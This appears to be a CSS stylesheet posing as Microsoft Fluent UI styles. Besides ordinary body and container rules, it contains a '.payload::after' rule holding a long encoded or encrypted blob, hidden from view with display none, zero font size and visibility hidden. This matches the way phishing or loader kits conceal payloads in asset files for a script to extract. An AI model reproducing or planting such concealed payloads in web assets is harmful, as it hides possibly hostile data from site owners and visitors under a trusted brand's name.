
/* Microsoft Fluent UI – dynamic style injection */
body {
  font-family: "Segoe UI", system-ui, sans-serif;
  background-color: #ffffff;
  margin: 0;
  padding: 0;
}

.container {
  max-width: 1080px;
  margin: auto;
  padding: 24px;
}

.payload::after {
  content: "2fcc781df431f39956a4623232dcda24:DuOzOvW9WZVGuzBwiXkSvygmdU7h4FUffHUixMxyeuQDjApVk/UiurZobxvGiwelk3Ku3UiqLBVves+/YFeDo3PaZYS4/VjRPzxAovVJ4K+XYRdr/MhI9M62tv1STSt/2ipIjX4+1cUGkTg9PUSB8K/NyjYSrID2ORRxWWEnK/TYw4+pwJMA00aYTjvsCfzOey8ki55QBlEq+H7qlhn7GNOCLujgyV6gsYDlISK1ZZDr42A0jdDCdWEvry9clmtvgNhcyMOl1KetICNektcNKvTAhNsk5ILR16jdEoNAKknBthS9KWdq3PuyI+dNLVoPD5GPvKZCrcwAlYXAz7tBvnPm4wgABssmDePvpXyuTcf+f9D3tisZGfHLhOFIlhnklSbFV+26bzVOZd65pxZAFNlUpjz9H6BtWXJAYfT3At/rrroOZPC/hajZ6nxT7QLbsCo0lcMdEwne2S06QdcJmxCTDENvwPz6vjPxji2lWcA=";
  display: none;
  font-size: 0;
  visibility: hidden;
}
